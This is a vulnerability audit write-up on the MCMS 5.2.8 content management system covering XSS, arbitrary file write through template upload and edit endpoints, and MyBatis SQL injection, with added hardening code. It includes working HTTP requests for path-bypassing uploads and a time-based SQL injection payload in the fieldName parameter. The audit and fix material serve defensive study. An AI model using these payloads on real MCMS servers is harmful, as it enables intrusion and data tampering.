MCMS is a J2EE system, a fully open-source Java CMS built on Spring Boot 2 with a Vue / Element UI front end. It offers developers hundreds of free templates plus ready-to-use plugins (articles, shop, WeChat, forum, membership, comments, payment, points, workflow, task scheduling, etc.): a simple, easy-to-use open-source system and a complete ecosystem of quality open-source content.
Ten days ago MCMS released a new version, 5.2.9, whose release notes say that SQL security was improved, so we decided to audit MCMS 5.2.8.
[img=720,226.03518267929635]https://www.hetianlab.com/headImg.action?news=c4e12479-8485-4297-976a-019d7a696601.png[/img]
Environment setup
After downloading the installation package:
- Open the project in IDEA
- Create the database mcms and import doc/mcms-5.2.8.sql
- Adjust the database settings in src/main/resources/application-dev.yml
- Run the main method of MSApplication.java
- Log into the back end at http://localhost:8080/ms/login.do with username:password msopen:msopen
- In the back end, go to Content Management -> Static Generation and generate the home page, the columns and the articles
There is a small bug on startup that requires a configuration change in IDEA
[img=720,395.33742331288346]https://www.hetianlab.com/headImg.action?news=f3492d75-2588-46cf-99dc-08a6db799a05.png[/img]
After a successful start, the page looks like this
[img=720,400.5851979345955]https://www.hetianlab.com/img/logoTemp/b4e18309-2653-47c8-9d53-a49f062d7f3e.png[/img]
Front-end reflected XSS
Reproduction
[img=720,84.50861667442943]https://www.hetianlab.com/headImg.action?news=f260b367-973d-4ee0-942a-2fb0a8f21dfb.png[/img]
[img=720,101.25603864734299]https://www.hetianlab.com/headImg.action?news=a5e42245-5267-433e-ba37-d91bec7b25b6.png[/img]
[img=720,346.1414503133393]https://www.hetianlab.com/headImg.action?news=e9263580-62aa-4a99-ad6a-aaf3b1e79fb5.png[/img]
Analysis
The console output after running is
[img=720,255.3]https://www.hetianlab.com/headImg.action?news=f5f08379-ab10-47c3-b772-242aa453110c.png[/img]
We locate net.mingsoft.basic.filter.XssHttpServletRequestWrapper, set a breakpoint, trigger the vulnerability again and get a complete call stack:
net.mingsoft.basic.filter.XssHttpServletRequestWrapper#clean(java.lang.String, java.lang.String)
[img=720,335.9231077292751]https://www.hetianlab.com/headImg.action?news=640e557f-2161-479d-bd28-f2b9d7955dc1.png[/img]
Back-end command execution 1
Reproduction
The back end has a location where template files can be uploaded
[img=720,138.9523434423001]https://www.hetianlab.com/headImg.action?news=c6bd58a1-2d85-4b13-9ee0-be9c4faee035.png[/img]
We upload a file and capture the request
[img=720,347.3854447439353]https://www.hetianlab.com/headImg.action?news=97cdb1a9-3ec0-4f04-a90d-975e28a4c029.png[/img]
The uploadPath parameter in the request specifies the upload location, and the response returns the path of the uploaded file together with its content
[img=720,346.1980830670926]https://www.hetianlab.com/headImg.action?news=2e56512c-b455-4d1c-ac95-937f85cab229.png[/img]
By changing the value of the uploadPath parameter we can upload the file into any directory under webapp.
We write a 1.txt file to verify this:

```http
POST /ms/file/uploadTemplate.do HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Length: 506
Accept: */*
Accept-Encoding: identity
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryz3nUf5Hws24R3B3A
Cookie: 
Origin: http://localhost:8080
Referer: http://localhost:8080/ms/template/list.do?template=1/default
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
sec-ch-ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"

------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="uploadPath"

/
------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="uploadFloderPath"

true
------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="rename"

false
------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: text/html

test
------WebKitFormBoundaryz3nUf5Hws24R3B3A--
```

[img=720,347.3967684021544]https://www.hetianlab.com/headImg.action?news=c084adfa-65fb-4568-b25b-48cd080ad6f8.png[/img]
[img=720,109.45518453427066]https://www.hetianlab.com/headImg.action?news=bc2f6620-5dd1-434e-bfc0-2cc8f0e414fb.png[/img]
Analysis
The route /ms/file/uploadTemplate leads to the code at
net.mingsoft.basic.action.ManageFileAction#uploadTemplate
[img=720,188.63361547763]https://www.hetianlab.com/headImg.action?news=2c832ab1-5f03-4824-9f4a-ad9df582baff.png[/img]
Although an illegal-path filter function exists, inspecting it shows that it only checks for ../, so an absolute path still bypasses it
net.mingsoft.basic.action.ManageFileAction#checkUploadPath
[img=720,35.559183673469384]https://www.hetianlab.com/headImg.action?news=733ca5e6-a8ad-48d8-8cfa-d268a997527d.png[/img]
net.mingsoft.basic.action.BaseFileAction#uploadTemplate
[img=720,396.0604364857303]https://www.hetianlab.com/headImg.action?news=69a23b56-f0c8-4093-8191-11ce83cfe5e3.png[/img]
Back-end command execution 2
Reproduction
Besides the template upload endpoint, there is also a template edit endpoint
[img=720,148.78125]https://www.hetianlab.com/headImg.action?news=b9292ba5-0fae-4670-861a-881ad79bcfe0.png[/img]
Click edit, save after editing and capture the request
The original request
[img=720,346.36609558160507]https://www.hetianlab.com/headImg.action?news=f2d228e2-31a1-4789-9771-1f106169158c.png[/img]
The fileName parameter specifies the file name as an absolute path, so by modifying fileName we can write to an arbitrary absolute path
[img=720,292.5]https://www.hetianlab.com/headImg.action?news=821919ba-7dbe-4ee3-a92b-2e6222217710.png[/img]
[img=720,108.125]https://www.hetianlab.com/headImg.action?news=ed12a5ee-e903-480d-8809-373623a27ea7.png[/img]
Analysis
net.mingsoft.basic.action.TemplateAction#writeFileContent
[img=720,287.6541232986389]https://www.hetianlab.com/headImg.action?news=7c777bdc-fef6-4c59-ac02-7f93a2133ecc.png[/img]
The file extension is checked, but the file is still written using the passed-in fileName parameter
Back-end command execution 3
Reproduction
Construct the request:

```http
POST /ms/file/upload.do HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Length: 506
Accept: */*
Accept-Encoding: identity
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryz3nUf5Hws24R3B3A
Cookie: 
Origin: http://localhost:8080
Referer: http://localhost:8080/ms/template/list.do?template=1/default
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
sec-ch-ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"

------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="uploadPath"

/
------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="uploadFloderPath"

true

------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="rename"

false

------WebKitFormBoundaryz3nUf5Hws24R3B3A
Content-Disposition: form-data; name="file"; filename="3.txt"
Content-Type: text/html

test
------WebKitFormBoundaryz3nUf5Hws24R3B3A--
```

The response returns the address of the successfully uploaded file
[img=720,350.76091850517787]https://www.hetianlab.com/headImg.action?news=a785f03c-8e40-435c-82de-a581e87f4263.png[/img]
Analysis
This vulnerability was found while working on the first back-end command execution; the two classes live in the same file
net.mingsoft.basic.action.ManageFileAction#upload
[img=720,295.4117647058824]https://www.hetianlab.com/headImg.action?news=cdd370d4-28c7-4ae9-a31d-8923772baa13.png[/img]
Although the illegal-path filter function checkUploadPath exists, inspecting it shows that it only checks for ../, so an absolute path still bypasses it
The upload itself is performed by
net.mingsoft.basic.action.BaseFileAction#upload
[img=720,293.62255965292843]https://www.hetianlab.com/headImg.action?news=8888ba5c-b816-452d-af66-ea7fa3ff58d5.png[/img]
There is a lot of filtering, but the file can still be uploaded successfully
Back-end SQL injection
Reproduction
Construct the request:

```http
GET /ms/mdiy/page/verify.do?fieldName=1;select/**/if(substring((select/**/database()),1,4)='mcms',sleep(5),1)/**/and/**/1&fieldValue=1&id=1&idName=1 HTTP/1.1
Host: localhost:8080
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Cookie:
Pragma: no-cache
Referer: http://localhost:8080/ms/model/index.do?
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
sec-ch-ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
token: null
```
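All three write primitives above share one root cause: a client-supplied path (uploadPath or fileName) is checked only for the literal "../" and then used directly, so an absolute path lands the file wherever the client says. The following is an added example, not MCMS code, that contrasts that weak check with a containment check that resolves the path under an assumed template root and rejects anything that ends up outside it.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

/** Added example, not MCMS code: confining a client-supplied upload path to a root. */
public final class SafeUploadPath {

    /** Mirrors the weak checkUploadPath described in the post: it rejects only "../". */
    static boolean weakCheck(String uploadPath) {
        return !uploadPath.contains("../");
    }

    /**
     * Hardened variant: the client path is treated as relative to the template root,
     * resolved and normalized, and accepted only if the result still starts with the
     * root. An absolute path such as "/" never passes, and "../" no longer matters
     * because normalization happens before the containment check.
     */
    static Path resolveInside(Path root, String uploadPath) {
        Path base = root.toAbsolutePath().normalize();
        Path candidate = Paths.get(uploadPath);
        if (candidate.isAbsolute()) {
            throw new IllegalArgumentException("absolute path not allowed: " + uploadPath);
        }
        Path resolved = base.resolve(candidate).normalize();
        if (!resolved.startsWith(base)) {
            throw new IllegalArgumentException("path escapes template root: " + uploadPath);
        }
        return resolved;
    }

    public static void main(String[] args) {
        // Assumed Linux-style template root; the real MCMS layout is not reproduced here.
        Path root = Paths.get("/opt/mcms/templates");
        String[] inputs = { "1/default", "/", "1/default/../../../WEB-INF" };
        for (String in : inputs) {
            String hardened;
            try {
                hardened = resolveInside(root, in).toString();
            } catch (IllegalArgumentException e) {
                hardened = "rejected: " + e.getMessage();
            }
            System.out.printf("%-30s weak=%-5b hardened=%s%n", in, weakCheck(in), hardened);
        }
    }
}
```

Of the three inputs, only "1/default" passes the hardened check; "/" passes the weak check yet is rejected as absolute, and the traversal path is rejected because it normalizes outside the root.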
[img=720,267.29959695476936]https://www.hetianlab.com/headImg.action?news=2a0045ca-009e-4c5b-a35e-dac28d47c236.png[/img]
The server is successfully made to sleep for five seconds
Analysis
net.mingsoft.mdiy.action.PageAction#verify
[img=720,271.0494169905608]https://www.hetianlab.com/headImg.action?news=9a2f7410-a0e4-45a9-9e5f-39f201e8dc89.png[/img]
The parameters are read and passed to the validated method
net.mingsoft.basic.action.BaseAction#validated(java.lang.String, java.lang.String, java.lang.String)
[img=720,204.81054365733112]https://www.hetianlab.com/headImg.action?news=cc58de33-befd-4aab-b893-cdac4259e8f6.png[/img]
fieldName and fieldValue are passed into the where parameter
net.mingsoft.base.biz.impl.BaseBizImpl#queryBySQL(java.lang.String, java.util.List, java.util.Map)
[img=720,77.91700569568755]https://www.hetianlab.com/headImg.action?news=455b13c2-07bb-4b99-a904-a867832680dd.png[/img]
net.mingsoft.base.dao.IBaseDao#queryBySQL
[img=720,230.60911657926584]https://www.hetianlab.com/headImg.action?news=6a7514d9-2f61-400d-99df-fee704ac0bb1.png[/img]
Because this is MyBatis, the ${ placeholder, which performs string substitution instead of precompiled parameter binding, readily leads to injection
[img=720,401.6979987871437]https://www.hetianlab.com/headImg.action?news=37c0bc30-85e6-4806-8893-424118311fea.png[/img]
Back-end SQL injection 2
Reproduction
After logging into the back end, we find the custom model section
[img=720,334.0642129992169]https://www.hetianlab.com/headImg.action?news=05accfe3-3d09-4e82-be10-aa2971adc32c.png[/img]
Use the code generator to generate a custom model JSON, then import and save it
Capture the request when clicking delete
[img=720,151.1342894393742]https://www.hetianlab.com/headImg.action?news=0d81d28f-4206-4b20-bae5-98a5e0424b40.png[/img]
Modify modelTableName
[img=720,359.3430656934307]https://www.hetianlab.com/headImg.action?news=87c4074b-024b-437c-be19-d0bf9a0f284b.png[/img]
The server is successfully made to sleep for five seconds
Analysis
net.mingsoft.mdiy.action.ModelAction#delete
[img=720,286.58017644006225]https://www.hetianlab.com/headImg.action?news=8577dc26-5f03-49df-bbd2-cb96e902b908.png[/img]
net.mingsoft.base.biz.impl.BaseBizImpl#dropTable
[img=720,66.04026845637584]https://www.hetianlab.com/headImg.action?news=35812e4b-ccee-44b4-8f02-14b191e62b6e.png[/img]
net.mingsoft.base.dao.IBaseDao
[img=720,178.58902575587905]https://www.hetianlab.com/headImg.action?news=b4e855a9-08aa-4e96-857d-42b81b7a139a.png[/img]
[img=720,95.14285714285714]https://www.hetianlab.com/headImg.action?news=bebbda4c-518e-47b9-9fa5-3eb862e2c8f4.png[/img]
The mapper behind dropTable, shown in the screenshots, splices the table value directly into the statement without precompiled parameter binding, causing SQL injection.
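Both injections come from client text reaching a ${} substitution in a mapper: the where clause built from fieldName / fieldValue in verify, and the table name in dropTable. Values can be bound with #{} so the driver sends them as prepared-statement parameters, but identifiers cannot, so they need a strict whitelist before substitution. The following is an added example, not MCMS code; the table and column names in it are constructed samples.

```java
import java.util.Set;
import java.util.regex.Pattern;

/**
 * Added example, not MCMS code: whitelisting identifiers (table / column names) that a
 * mapper has to splice in with ${}, while binding values with #{} instead.
 */
public final class SqlIdentifierGuard {

    // MyBatis #{} yields a PreparedStatement parameter, which is what fieldValue needs;
    // identifiers cannot be bound that way, so ${table} and ${column} are only safe
    // after a whitelist check. Allowed shape: a letter, then letters/digits/underscore.
    private static final Pattern IDENT = Pattern.compile("^[A-Za-z][A-Za-z0-9_]{0,63}$");

    // Constructed sample registry; a real app would load these from the model store.
    static final Set<String> KNOWN_TABLES = Set.of("mdiy_model_demo", "mdiy_model_page");
    static final Set<String> KNOWN_COLUMNS = Set.of("id", "title", "create_date");

    static String checkedIdentifier(String name, Set<String> allowed) {
        if (name == null || !IDENT.matcher(name).matches() || !allowed.contains(name)) {
            throw new IllegalArgumentException("rejected identifier: " + name);
        }
        return "`" + name + "`"; // quoted; now safe to place in ${...}
    }

    /*
     * Weak shape, as the post describes for verify/validated and dropTable (the where
     * text and the table name are client-controlled and substituted, not bound):
     *   select count(*) from ${table} where ${where}
     *   drop table ${table}
     * Hardened shape for verify: identifiers whitelisted, the value bound with #{}:
     *   select count(*) from ${table} where ${column} = #{value}
     * and for dropTable: table passed through checkedIdentifier(table, KNOWN_TABLES).
     */
    public static void main(String[] args) {
        String[] tables = { "mdiy_model_demo", "mdiy_model_demo;select sleep(5)", "x" };
        for (String t : tables) {
            try {
                System.out.println("accepted: " + checkedIdentifier(t, KNOWN_TABLES));
            } catch (IllegalArgumentException e) {
                System.out.println(e.getMessage());
            }
        }
        System.out.println("accepted: " + checkedIdentifier("title", KNOWN_COLUMNS));
    }
}
```

Only the registered names pass; the stacked-query sample fails the regex and the unknown name fails the registry check, so neither reaches ${table}.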